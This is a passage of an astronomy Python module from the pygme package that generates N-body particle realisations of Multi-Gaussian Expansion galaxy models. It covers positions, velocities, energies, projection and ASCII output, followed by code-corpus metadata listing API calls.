SigmaTheta and SigmaZ for the Gas, in km/s - default to 10 km/s for all 3 values\n TruncationMethod : Method to sample the positions.\n \"Ellipsoid\" (default): will follow the isosurface of each Gaussians at that radius as a cut\n mcut will be used (in pc)\n \"Cylindre\" means an R, Z Cylindrical cal (Rcut, Zcut will be used - in pc)\n Add_BHParticle : boolean, if defined (Default is True):\n True means that a BH particle is added if Mbh > 0\n False means that if Mbh > 0, the potential will take it\n into account but no particle is added\n Softening: in pc, softening added in quadrature to the gaussian Sigmas for the potential, Default is 0 (no softening)\n FacBetaEps : factor involved when using the BETAEPS option as an anisotropy parameter for the\n Gaussians. When one of the Gaussian component is using BETAEPS for K_R_Z, we fix the\n anisotropy to -> delta = FacBetaEps * Epsilon where delta = 1 - Sigma_Z^2/Sigma_R^2 and\n Epsilon is the intrinsic ellipticity of that Gaussian. 
Setting FacBetaEps >= 0.8 is not\n permitted (as this would break the requirement on the second order moments).\n\n verbose: default is 1, will print some more information\n \"\"\"\n import time\n\n ## Checking a Few things before starting ########################\n if self.nGauss <= 0 :\n print('ERROR: NGAUSS is not right (= %d)' %self.nGauss)\n return\n if self.TtruncMass <= 0:\n print('ERROR: Mass of the model (= %g) is not right' %self.TtruncMass)\n return\n opGAS = (self.nGasGauss != 0)\n opSTAR = (self.nStarGauss != 0)\n opHALO = (self.nHaloGauss != 0)\n\n ## Number of Groups -------------------------##\n if self.nGroup == 0:\n print(\"ERROR: nGroup is 0\")\n return\n if self.nDynComp == 0:\n print(\"ERROR: nDynComp is 0\")\n return\n\n ## Some options from kwargs -- INITIALISATION -------------------------------------- ##\n ##--- Compute only positions or also velocities ? ---##\n ComputeV = kwargs.get('ComputeV', True)\n GasDisk = kwargs.get('GasDisk', True)\n ## Get the dispersion for the gas in km/s -----------##\n (self.SigRGas, self.SigThetaGas, self.SigZGas) = kwargs.get('SigmaGas',(10.0,10.0,10.0))\n ## Add a BH particle or not? --- ##\n self.Add_BHParticle = kwargs.get('Add_BHParticle', True)\n ## Overwrite mode : 'o' or None ------------------------ ##\n self.overwrite = kwargs.get('overwrite', None)\n ## First Realised Particle, and Max number of Particle -- ##\n self.FirstRealisedPart = np.int(kwargs.get('FirstRealisedPart', 0))\n self.nMaxPart = np.int(kwargs.get('nMaxPart', 0))\n ## Softening -- default is 0 (no softening)--------- ##\n self.Softening = kwargs.get('Softening', 0.0)\n ## Verbose: default is 1 ----------##\n verbose = kwargs.get('verbose', 1)\n ## -------------------------------------------------------------------------------------##\n\n ## Softening in pc----------------------------------##\n if self.Softening > 0. :\n print(\"WARNING: Softening will be %g (pc) !!!\"%(self.Softening))\n self.Softarc = self.Softening / self.pc_per_arcsec # Softening in Arcseconds\n self.SoftarcMbh = self.Softarc # best approx for Mbh smoothing\n self.SoftarcMbh2 = self.SoftarcMbh**2\n\n ## -- Method for Truncating the Density distribution of particles ---##\n self.TruncationMethod = kwargs.get('TruncationMethod', 'Ellipsoid')\n if self.TruncationMethod == \"Cylindre\" :\n self.Rcut = kwargs.get('Rcut', 50000)\n self.Zcut = kwargs.get('Zcut', 50000)\n Xcut = self.Rcut\n self.Rcutarc = self.Rcut / self.pc_per_arcsec\n self.Zcutarc = self.Zcut / self.pc_per_arcsec\n elif self.TruncationMethod == \"Ellipsoid\" :\n self.mcut = kwargs.get('mcut', 50000)\n Xcut = self.mcut\n self.mcutarc = self.mcut / self.pc_per_arcsec\n else :\n print(\"ERROR: TruncationMethod should be Cylindre or Ellipsoid. 
not %s\" %(self.TruncationMethod))\n return\n\n ## We first save the MGE file for archival purposes, as well as the initial parameters\n self.RealisationTime = time.time()\n dest_filename = self.saveMGE + \"/\" + \"%s_\"%(str(self.RealisationTime)) + self.MGEname\n if os.path.isfile(dest_filename) & (str(self.overwrite).lower() != \"o\") :\n print(\"ERROR: filename already exists in Archival Directory %s\"%(dest_filename))\n print(\" Please use overwrite mode (O) or provide a different output directory (saveMGE)\")\n return\n os_command = \"cp %s %s\"%(self.fullMGEname, dest_filename)\n os.system(os_command)\n #--------------------------------------------------------------------------------------#\n\n ## Save the command into a file with the same time\n text = \"init_nbody(Rcut=%g, Zcut=%g, mcut=%g, ComputeV=%d, GasDisk=%s, SigRGas=%g, SigThetaGas=%g, SigZGas=%g, TruncationMethod=%s, Add_BHParticle=%r, FirstRealisedPart=%r, nMaxPart=%r, overwrite=%r)\\n\"%(self.Rcut, self.Zcut, self.mcut, ComputeV, GasDisk, self.SigRGas, self.SigThetaGas, self.SigZGas, self.TruncationMethod, self.Add_BHParticle, self.FirstRealisedPart, self.nMaxPart, self.overwrite)\n fout = open(self.saveMGE + \"/\" + \"%s\"%(str(self.RealisationTime)) + \".MGE_CI\", \"w+\")\n fout.write(text)\n fout.close()\n #-------------------------------------------------#\n\n ## Get all parameters right and the number of particles too\n self._comp_Nparticles()\n\n #==============================================================================================================\n ## End of parameter initialisation\n #==============================================================================================================\n ## Beginning of allocation\n #==============================================================================================================\n\n self.R = np.zeros(self.nRealisedPart, floatMGE)\n self.theta = np.zeros(self.nRealisedPart, floatMGE)\n self.z = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.x = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.y = np.zeros(self.nRealisedPart, floatMGE) ## in Parsec\n self.BodGroup = np.zeros(self.nRealisedPart, int)\n self.BodGauss = np.zeros(self.nRealisedPart, int)\n self.BodMass = np.zeros(self.nRealisedPart, floatMGE)\n ## Add the mass of the particle at 0,0,0 0,0,0 (last particle)\n if self.nRealisedPartBH == 1 :\n self.BodMass[-1] = self.Mbh\n\n ## Allocation for particles dynamics ############################\n self.NSpin = np.ones(self.nRealisedPart, floatMGE)\n self.NkRTheta = np.zeros(self.nRealisedPart, floatMGE)\n self.NkRZ = np.zeros(self.nRealisedPart, floatMGE)\n\n # Now: how do we derive sigma_R or sigma_Theta\n if self.epicycle.any() : ## Theta will be derived from sigma_R with the epicycle approximation\n R = np.linspace(0., Xcut, 1000) ## Derive a range of R in parsec\n epiratio = self.EpicycleRatio(R / self.pc_per_arcsec) # R is passed in arcsec\n # Function to have from R in pc, sigma_R / sigma_Theta from the epicycle approximation\n funcEpiratio = interpolate.interp1d(R, epiratio)\n\n ## Now we implement (if betaeps=1) the relation beta = 0.6 * eps\n ## Only if specified\n if 'FacBetaEps' in kwargs :\n self.FacBetaEps = kwargs.get('FacBetaEps', 0.6)\n self._init_BetaEps(verbose=True)\n\n ## Derive required values from the anisotropy kRZ2 (sig_R2/ sig_z2)\n self._dParam = dynParamMGE(self)\n\n ############### Computing POSITIONS for the N body realisation ##################\n # for each Gaussian, derive initial positions for 
particles\n ## Only do this if it is axisymmetric\n if self.axi == 1 :\n\n ##################################### BEGIN STARS, GAS, HALO ######################################\n self.Spin = np.ones(self.nGauss, np.int)\n for i in range(self.nGauss) :\n sigma = self.Sig3D[i]\n\n if self.TruncationMethod == \"Cylindre\" :\n self.x[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Rcut, npoints=self.nRealisedPartGauss[i], even=1)\n self.y[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Rcut, npoints=self.nRealisedPartGauss[i], even=1)\n sigma = self.Sig3D[i]*self.QxZ[i]\n self.z[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = sample_trunc_gauss(sigma=sigma, cutX=self.Zcut, npoints=self.nRealisedPartGauss[i], even=1)\n self.theta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = asarray(np.random.uniform(0., 2.*np.pi, size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n elif self.TruncationMethod == \"Ellipsoid\" :\n r = sample_trunc_r2gauss(sigma=sigma, cutr=self.mcut, npoints=self.nRealisedPartGauss[i])\n U = asarray(np.random.uniform(-1., 1., size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n V = asarray(np.random.uniform(0.,1., size=(self.nRealisedPartGauss[i],)), dtype=floatMGE)\n sqU = np.sqrt(1. - U*U)\n theta = 2. * np.pi * V\n self.x[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r*sqU*cos(theta)\n self.y[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r*sqU*sin(theta)\n self.z[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = r * U * self.QxZ[i]\n self.theta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = theta\n\n self.BodGauss[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = i+1\n self.BodGroup[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = self.GaussDynCompNumber[i]\n self.BodMass[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = self.pmassGauss[i]\n\n ## We set up things so that at the end we have kRZ and kRTheta\n ## First we test if one of the set up variable is negative, which means that we should inverse the Spin\n if (self.kRTheta[i] < 0) :\n self.kRTheta[i] = np.abs(self.kRTheta[i])\n self.Spin[i] = -1\n self.NSpin[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = - np.ones(self.nRealisedPartGauss[i], dtype=floatMGE)\n\n self.NkRZ[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = np.zeros(self.nRealisedPartGauss[i], dtype=floatMGE) + self.kRZ[i]\n if self.epicycle[i] :\n self.NkRTheta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = funcEpiratio(self.R[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]])\n else :\n self.NkRTheta[self.nRealisedPartCum[i]:self.nRealisedPartCum[i+1]] = np.zeros(self.nRealisedPartGauss[i], dtype=floatMGE) + self.kRTheta[i]\n\n print(\"NStar = %d particles Realised over a total of %d\" %(self.nRealisedPartStar, self.nPartStar))\n print(\"NGas = %d particles Realised over a total of %d\" %(self.nRealisedPartGas, self.nPartGas))\n print(\"NHalo = %d particles Realised over a total of %d\" %(self.nRealisedPartHalo, self.nPartHalo))\n if self.nRealisedPartBH == 1:\n print(\"Adding a BH particle of %e Msun\" %(self.Mbh))\n firstStar = 0 # index for the first Star particle\n firstGas = lastStar = self.nRealisedPartStar # index for the first Gas particle - last Star particle\n firstHalo = lastGas = firstGas + self.nRealisedPartGas # index for the first Halo particle - last Gas particle\n firstBH = lastHalo = firstHalo + self.nRealisedPartHalo # index for the BH particle - last 
Halo particle\n ##################################### END STARS, GAS, HALO ######################################\n\n ## Computing some important quantities : R, r, theta, xarc etc ------------------------- ##\n self.R = sqrt(self.x**2 + self.y**2)\n ## And r spherical\n self.r = sqrt(self.x**2 + self.y**2+self.z**2)\n\n ## Now computing the true theta\n self.theta[(self.x == 0.) & (self.y >= 0.)] = np.pi / 2.\n self.theta[(self.x == 0.) & (self.y < 0.)] = -np.pi / 2.\n self.theta[(self.x < 0.)] = arctan(self.y[(self.x < 0.)] / self.x[(self.x < 0.)]) + np.pi\n self.theta[(self.x > 0.)] = arctan(self.y[(self.x > 0.)] / self.x[(self.x > 0.)])\n\n ### Transforming in arcsecond\n self.xarc = self.x / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.yarc = self.y / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.zarc = self.z / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.Rarc = self.R / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n self.rarc = self.r / self.pc_per_arcsec ### Normalisation using the distance of the galaxy\n\n R2 = (self.Rarc)**2 ## R in arcsec\n Z2 = (self.zarc)**2 ## z in arcsec\n\n ############### Computing velocities for the N body realisation ##################\n if ComputeV :\n ### Integration using gaussian quadrature ###\n ### First compute the gaussian quadrature points, and weights\n print(\"Starting the derivation of velocities\")\n self.muTheta2 = np.zeros(self.nRealisedPart, floatMGE)\n self.sigz = np.zeros(self.nRealisedPart, floatMGE)\n self.sigR = np.zeros(self.nRealisedPart, floatMGE)\n self.sigT = np.zeros(self.nRealisedPart, floatMGE)\n self.vt = np.zeros(self.nRealisedPart, floatMGE)\n if verbose :\n print(\"End of memory alloc\")\n\n##### OPTION REMOVE if self.GLOBAL_Sigma == False :\n ## Doing it in Dynamical groups #################################\n if verbose :\n print(\"STARTING Local Sigma for each Dynamical Group\")\n ## First check that Dynamical Groups are ordered\n setGauss_Stars = list(range(self.nStarGauss))\n setGauss_Halo = list(range(self.nStarGauss + self.nGasGauss, self.nGauss))\n setGauss = np.concatenate((setGauss_Stars, setGauss_Halo))\n nRealisedPart = self.nRealisedPartStar + self.nRealisedPartHalo\n ## First derive the equations for each INDIVIDUAL DYNAMICAL GROUP for SIGMA_Z\n if nRealisedPart != 0 :\n for i in range(self.nDynComp) :\n iminG = np.min(self.listGaussDynComp[i])\n imaxG = np.max(self.listGaussDynComp[i])\n if (iminG >= self.nStarGauss) & (imaxG < self.nStarGauss+self.nGasGauss) & GasDisk:\n continue\n for j in range(iminG+1, imaxG) :\n if j not in self.listGaussDynComp[i] :\n print(\"ERROR: Dynamical Group %d should included ordered Gaussians\"%(i+1))\n print(\"ERROR: Dynamical Group %d is \"%(i+1),self.listGaussDynComp[i])\n return\n\n startI, endI = self.nRealisedPartCum[iminG], self.nRealisedPartCum[imaxG+1]\n if endI <= startI :\n continue\n R2comp = R2[startI: endI]\n Z2comp = Z2[startI: endI]\n self.rho, self.rhoT = self._MassDensity(R2comp, Z2comp, ilist=list(range(iminG,imaxG+1)))\n self.rhoT = np.where(self.rhoT > 0., self.rhoT, 1.0)\n temp1, temp2 = self._sigmaz2_muTheta2_fromR2Z2(R2comp, Z2comp, ilist=list(range(iminG,imaxG+1)))\n self.sigz[startI: endI] = sqrt(temp1)\n self.muTheta2[startI: endI] = temp2\n if verbose :\n print(\"End of sigz2 and mu2 derivation for Dynamical Group %02d\"%(i+1))\n\n##### REMOVING THIS OPTION - NOT REQUIRED CONSIDERING THE INPUT ASCII FILE WITH DYN GROUPS ###### 
else :\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"STARTING GLOBAL Sigma for All Stars and then Halo\"\n#### OPTION REMOVED ###### ## STARS ####################\n#### OPTION REMOVED ###### R2Star = R2[firstStar:lastStar]\n#### OPTION REMOVED ###### Z2Star = Z2[firstStar:lastStar]\n#### OPTION REMOVED\n#### OPTION REMOVED ###### imin = 0\n#### OPTION REMOVED ###### imax = self.nStarGauss-1 # Include all Gaussians, including Halo ones\n#### OPTION REMOVED ###### self.rho, self.rhoT = self._MassDensity(R2Star, Z2Star, imin=imin, imax=imax)\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## Compute both sigmaz2 and mu2 for the Stars\n#### OPTION REMOVED ###### temp1, temp2 = self.sigmaz2_mut2(R2Star, Z2Star, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.sigz2[firstStar:lastStar] = temp1\n#### OPTION REMOVED ###### self.mut2[firstStar:lastStar] = temp2\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"End of sigz2 and mu2 derivation for Stars\"\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## HALO ####################\n#### OPTION REMOVED ###### R2Halo = R2[firstHalo:lastHalo]\n#### OPTION REMOVED ###### Z2Halo = Z2[firstHalo:lastHalo]\n#### OPTION REMOVED\n#### OPTION REMOVED ###### imin = self.nStarGauss + self.nGasGauss\n#### OPTION REMOVED ###### imax = self.nGauss-1 # Include all Gaussians, including Halo ones\n#### OPTION REMOVED ###### self.rho, self.rhoT = self._MassDensity(R2Halo, Z2Halo, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.rhoT = np.where(self.rhoT > 0., self.rhoT, 1.0)\n#### OPTION REMOVED\n#### OPTION REMOVED ###### ## Compute both sigmaz2 and mu2 for the Halos\n#### OPTION REMOVED ###### temp1, temp2 = self.sigmaz2_mut2(R2Halo, Z2Halo, imin=imin, imax=imax)\n#### OPTION REMOVED ###### self.sigz2[firstHalo:lastHalo] = temp1\n#### OPTION REMOVED ###### self.mut2[firstHalo:lastHalo] = temp2\n#### OPTION REMOVED ###### if verbose :\n#### OPTION REMOVED ###### print \"End of sigz2 and mu2 derivation for Halo\"\n\n ## Using only kRZ and kRTheta\n sigR = self.sigz * self.NkRZ\n sigTheta = np.minimum(sqrt(self.muTheta2), sigR / self.NkRTheta) # sigma Theta from sigma R\n vt = sqrt(np.clip(self.muTheta2 - sigTheta**2, 0., np.inf))\n self.sigR[firstStar:lastStar] = sigR[firstStar:lastStar] # sigma R from sigma Z\n self.sigR[firstHalo:lastHalo] = sigR[firstHalo:lastHalo] # sigma R from sigma Z\n self.sigT[firstStar:lastStar] = sigTheta[firstStar:lastStar] # sigma Theta from sigma R\n self.sigT[firstHalo:lastHalo] = sigTheta[firstHalo:lastHalo] # sigma Theta from sigma R\n # Mean V theta\n self.vt[firstStar:lastStar] = vt[firstStar:lastStar]\n self.vt[firstHalo:lastHalo] = vt[firstHalo:lastHalo]\n if not GasDisk :\n self.sigR[firstGas:lastGas] = sigR[firstGas:lastGas] # sigma R from sigma Z\n self.sigT[firstGas:lastGas] = sigTheta[firstGas:lastGas] # sigma Theta from sigma R\n self.vt[firstGas:lastGas] = vt[firstGas:lastGas]\n if verbose :\n if GasDisk :\n print(\"End of sigz2 and mu2 derivation for All Stars and Halo particles\")\n else :\n print(\"End of sigz2 and mu2 derivation for All Stars, Gas and Halo particles\")\n\n ## GAS ######################\n if opGAS & GasDisk:\n self.vt[firstGas:lastGas] = self.Vcirc(self.Rarc[firstGas:lastGas])\n self.muTheta2[firstGas:lastGas] = self.vt[firstGas:lastGas]**2 + self.SigThetaGas**2\n temp = np.zeros_like(self.sigR[firstGas:lastGas])\n self.sigR[firstGas:lastGas] = temp + self.SigRGas # sigma R for the Gas\n self.sigT[firstGas:lastGas] = temp + 
self.SigThetaGas # sigma Theta for the Gas\n self.sigz[firstGas:lastGas] = temp + self.SigZGas # sigma Z for the Gas\n if verbose :\n print(\"End of sigz2 and mu2 derivation for Gas\")\n\n ## Changing the spin of the component\n self.vt *= self.NSpin\n\n ## Starting the randomization of velocities using the derived V and Sigma values\n print(\"Randomizing the Velocities\")\n Vescape = self.Vescape(self.Rarc,self.zarc) # Vescape : cut it if the total velocity is higher\n Nrejected = 0\n Nstart = 0\n Nremain = self.nRealisedPart\n ind = list(range(self.nRealisedPart))\n self.Vz = np.zeros(self.nRealisedPart, floatMGE)\n self.VR = np.zeros(self.nRealisedPart, floatMGE)\n self.Vtheta = np.zeros(self.nRealisedPart, floatMGE)\n self.Vtot = np.zeros(self.nRealisedPart, floatMGE)\n iter = 0\n while Nremain != 0 :\n ### Randomize the positions taking into account the 3D width of the Gaussian\n self.Vz[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigz[ind]\n self.VR[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigR[ind]\n self.Vtheta[ind] = asarray(np.random.normal(0., 1., Nremain), dtype=floatMGE) * self.sigT[ind] + self.vt[ind]\n\n self.Vtot[ind] = sqrt(self.Vz[ind]**2 + self.VR[ind]**2 + self.Vtheta[ind]**2)\n\n ind = np.ravel(np.where(self.Vtot[ind] > Vescape[ind])) # indices which are NOT ok with Vesc\n nrealised = Nremain - ind.size\n Nstart = Nstart+nrealised\n Nremain = ind.size\n iter += 1\n print(\"NtotalV = %d, Nrealised = %d, Nremaining = %d, Iter = %d\" %(Nstart, nrealised, Nremain, iter))\n Nrejected += Nremain\n\n print(\"Rejected (recalculated) points above Vescape: %d\" %(Nrejected))\n\n self.Vx = self.VR * cos(self.theta) - self.Vtheta * sin(self.theta)\n self.Vy = self.VR * sin(self.theta) + self.Vtheta * cos(self.theta)\n\n return\n\n############################################################################################################\n####################################### END OF NBODY REALIZATION ###########################################\n############################################################################################################\n\n def comp_Pot(self) :\n self.EcPot = self.Pot(self.Rarc, self.zarc)\n self.EcPotT = np.sum(self.EcPot)\n return\n\n def comp_Ep(self) :\n print(\"==== Potential Energy ====\")\n print(\"WARNING: this is a direct computation of the potential energy: can be time consuming!\")\n self.Ep = np.zeros(self.nRealisedPart, floatMGE)\n for i in range(self.nRealisedPart) :\n Ep = np.sum(concatenate((1./sqrt((self.x[:i] - self.x[i])**2 + (self.y[:i] - self.y[i])**2 + (self.z[:i] - self.z[i])**2), 1./sqrt((self.x[i+1:] - self.x[i])**2 + (self.y[i+1:] - self.y[i])**2 + (self.z[i+1:] - self.z[i])**2))),axis=0)\n self.Ep[i] = - Ep * self.Gorig * self.BodMass**2\n\n self.EpT = np.sum(self.Ep,axis=0) / 2.\n return\n\n def comp_Ec(self) :\n print(\"==== Kinetic Energy ====\")\n self.Ec = 0.5 * self.BodMass * (self.Vx**2 + self.Vy**2 + self.Vz**2)\n self.EcT = np.sum(self.Ec,axis=0)\n return\n\n ################## Projection of the MGE model ################\n def projpart(self, inclin=90.) 
:\n \"\"\" Projection of an MGE realization (N particles) using a defined inclination\n inclin: inclination in degrees, 90 being edge-on, 0 being face-on\n \"\"\"\n\n inclin_rad = inclin * np.pi / 180.\n self.Xp = self.x\n self.Yp = self.y * cos(inclin_rad) + self.z * sin(inclin_rad)\n self.Zp = - self.y * sin(inclin_rad) + self.z * cos(inclin_rad)\n self.Xparc = self.Xp / self.pc_per_arcsec\n self.Yparc = self.Yp / self.pc_per_arcsec\n self.Zparc = self.Zp / self.pc_per_arcsec\n\n self.Vrad = self.Vy * sin(inclin_rad) - self.Vz * cos(inclin_rad)\n\n return\n #===================================================================\n\n ##################################################################\n ### Save the Nbody coordinates x,y,z,Vx,Vy,Vz in an ascii file #\n ##################################################################\n def save_nbody(self, outdir=None, outfilename=None, overwrite=False, arcsec=False) :\n \"\"\" Save the N body realizationof an MGE model into an ascii file\n name : string defining the name of the output file\n overwrite: if file exists, overwrite or not - default = False\n arcsec: save the positions in arcseconds or pc - default= False (pc)\n \"\"\"\n if outfilename is None :\n print(\"You must specify an output ascii file\")\n return\n\n if outdir is not None :\n outfilename = outdir + outfilename\n\n if os.path.isfile(outfilename) and overwrite==False : # testing the existence of the file\n print('WRITING ERROR: File %s already exists, use overwrite=True if you wish' %outfilename)\n return\n\n ascii_file = open(outfilename, mode=\"w\")\n\n if arcsec == True :\n outx = self.xarc\n outy = self.yarc\n outz = self.zarc\n else :\n outx = self.x\n outy = self.y\n outz = self.z\n\n for i in range(self.nRealisedPart) :\n line = \"%12.5e %12.5e %12.5e %12.5e %12.5e %12.5e %12.5e \\n\" %(outx[i], outy[i], outz[i], self.Vx[i], self.Vy[i], self.Vz[i], self.BodMass[i])\n ascii_file.write(line)\n\n ascii_file.close\n return\n #===================================================================\n", "sub_path": "pygme/init_partMGE.py", "file_name": "init_partMGE.py", "file_ext": "py", "file_size_in_byte": 30045, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "pygme.dynMGE.dynMGE", "line_number": 27, "usage_type": "name"}, {"api_name": "pygme.dynMGE.dynMGE.__init__", "line_number": 29, "usage_type": "call"}, {"api_name": "pygme.dynMGE.dynMGE", "line_number": 29, "usage_type": "name"}, {"api_name": "numpy.int", "line_number": 100, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 101, "usage_type": "call"}, {"api_name": "time.time", "line_number": 132, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.system", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 158, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 158, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 159, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 159, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 160, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 160, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 161, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 161, "usage_type": "argument"}, {"api_name": 
"numpy.zeros", "line_number": 162, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 162, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 164, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 165, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 165, "usage_type": "argument"}, {"api_name": "numpy.ones", "line_number": 171, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 171, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 172, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 172, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 173, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 173, "usage_type": "argument"}, {"api_name": "numpy.linspace", "line_number": 177, "usage_type": "call"}, {"api_name": "scipy.interpolate.interp1d", "line_number": 180, "usage_type": "call"}, {"api_name": "scipy.interpolate", "line_number": 180, "usage_type": "name"}, {"api_name": "pygme.paramMGE.dynParamMGE", "line_number": 189, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 197, "usage_type": "attribute"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 202, "usage_type": "call"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 203, "usage_type": "call"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_gauss", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 206, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 206, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 206, "usage_type": "name"}, {"api_name": "pygme.mge_miscfunctions.sample_trunc_r2gauss", "line_number": 208, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 209, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 209, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 210, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 210, "usage_type": "attribute"}, {"api_name": "rwcfor.floatMGE", "line_number": 210, "usage_type": "name"}, {"api_name": "numpy.sqrt", "line_number": 211, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 212, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 213, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 214, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 227, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 227, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 229, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 229, "usage_type": "name"}, {"api_name": "numpy.zeros", "line_number": 233, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 233, "usage_type": "name"}, {"api_name": 
"numpy.sqrt", "line_number": 247, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 249, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 252, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 253, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 254, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 254, "usage_type": "attribute"}, {"api_name": "numpy.arctan", "line_number": 255, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 272, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 272, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 273, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 273, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 274, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 274, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 275, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 275, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 276, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 276, "usage_type": "argument"}, {"api_name": "numpy.concatenate", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 292, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 293, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 308, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 310, "usage_type": "call"}, {"api_name": "numpy.minimum", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 351, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 352, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 352, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 374, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 391, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 391, "usage_type": "argument"}, {"api_name": "numpy.zeros", "line_number": 392, "usage_type": "call"}, {"api_name": "rwcfor.floatMGE", "line_number": 392, "usage_type": "argument"}, {"api_name": 